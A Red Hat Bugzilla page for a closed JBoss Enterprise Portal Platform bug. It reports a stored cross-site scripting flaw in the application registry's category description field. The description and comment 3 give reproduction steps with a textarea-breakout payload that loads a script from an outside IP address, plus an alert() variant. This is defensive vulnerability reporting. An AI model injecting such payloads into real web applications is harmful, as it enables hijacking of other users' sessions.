Bug 793926 (JBEPP-997) - XSS issue in category description
Summary: XSS issue in category description
Keywords:
Status: CLOSED NEXTRELEASE
Alias: JBEPP-997
Product: JBoss Enterprise Portal Platform 5
Classification: JBoss
Component: unspecified
Version: 5.1.1.GA
Hardware: Unspecified
OS: Unspecified
high
high
Target Milestone: ---
: 5.1.1.DEV03,5.2.0.DEV02
Assignee: Thomas Heute
QA Contact:
URL: http://jira.jboss.org/jira/browse/JBE...
Whiteboard:
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2011-07-08 08:35 UTC by Thomas Heute
Modified: 2012-02-28 16:33 UTC (History)
4 users (show)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2011-08-11 09:02:29 UTC
Type: Bug

Attachments (Terms of Use)
Add an attachment (proposed patch, testcase, etc.)


Links
System ID Private Priority Status Summary Last Updated
Red Hat Bugzilla 793281 0 medium CLOSED XSS in page title 2021-02-22 00:41:40 UTC
Red Hat Bugzilla 793952 0 high CLOSED Gadget source is escaped in editor 2021-02-22 00:41:40 UTC
Red Hat Bugzilla 794008 1 None None None 2021-01-20 06:05:38 UTC
Red Hat Issue Tracker JBEPP-997 0 None None None Never

Internal Links: 793281 793952 794008

Description Thomas Heute 2011-07-08 08:35:00 UTC 
Help Desk Ticket Reference: https://c.na7.visual.force.com/apex/Case_View?id=500A0000007CtcY&sfdc.override=1
project_key: JBEPP

Our application security center of excellence discovered a cross-site scripting vulnerability with the application registry portlet.  Here are the steps to reproduce:

Steps to Reproduce Exploit:
1. Log in to the application as "Administrators" user role.
2. Click on "Edit Category" button.
3. Type at the "Description" field the following: Dashboard</textarea><script
src=\\3.211.64.16\xsrf\a.js></script&gt;.
4. Press on &quot;Save&quot; button.
5. Then click on &quot;Edit Category&quot; button.
6. Finally, the script is executed as proof of the vulnerability
Comment 1 Thomas Heute 2011-07-08 08:51:08 UTC 
Link: Added: This issue is related to GTNPORTAL-1955
Comment 2 Thomas Heute 2011-07-08 09:46:34 UTC 
Help Desk Ticket Reference: Added: https://c.na7.visual.force.com/apex/Case_View?id=500A0000007CtcY&sfdc.override=1
Comment 3 Bruno Machado 2011-07-08 14:59:14 UTC 
Pretty much the same steps in the description of this Jira. I could also reproduce using <script>alert("some string") as showed in step 4.

1. login as root
2. Group -> Administration -> Application Registry
3. Edit Category
4. Type at the "Description" field the following:

Dashboard</textarea><script src=\\3.211.64.16\xsrf\a.js>

or

Dashboard</textarea><script>alert("Bad XSS");</script>

5. Click on Save button.
6. Then click on "Edit Category" button.
7. Finally, the script is executed as proof of the vulnerability
Comment 4 Thomas Heute 2011-07-10 19:23:02 UTC 
I don't understand, are you saying that the patch doesn't work ?
Comment 5 Scott Mumford 2011-07-11 01:36:34 UTC 
Release Notes Docs Status: Added: Not Required
Release Notes Text: Added: Included in the Release Note for JBEPP-598
Comment 6 Bruno Machado 2011-07-11 21:12:02 UTC 
I hadn't seen that the case status was Resolved while I was righting my comment, you can probably ignore it. I haven't test with 5.1.1.DEV03 yet, I was just saying that error was happening with the strings "Dashboard</textarea><script src=" and "Dashboard</textarea><script>".

Thanks.
Comment 7 hfnukal@redhat.com 2011-08-02 05:46:47 UTC 
Link: Added: This issue is related to JBEPP-1023
Comment 8 hfnukal@redhat.com 2011-08-02 05:47:45 UTC 
Link: Added: This issue is related to JBEPP-365
Comment 9 Michal Vanco 2011-08-10 11:54:21 UTC 
Re-opening the issue, still present in 5.1.1 GA.
Comment 10 Michal Vanco 2011-08-17 14:58:34 UTC 
Link: Added: This issue relates to JBEPP-1079
Comment 11 hfnukal@redhat.com 2011-08-31 15:40:34 UTC 
Link: Added: This issue is related to GTNPORTAL-2073
Comment 12 hfnukal@redhat.com 2011-09-07 16:19:03 UTC 
Security: Removed: RHT+eXo Added: Public
Note You need to log in before you can comment on or make changes to this bug.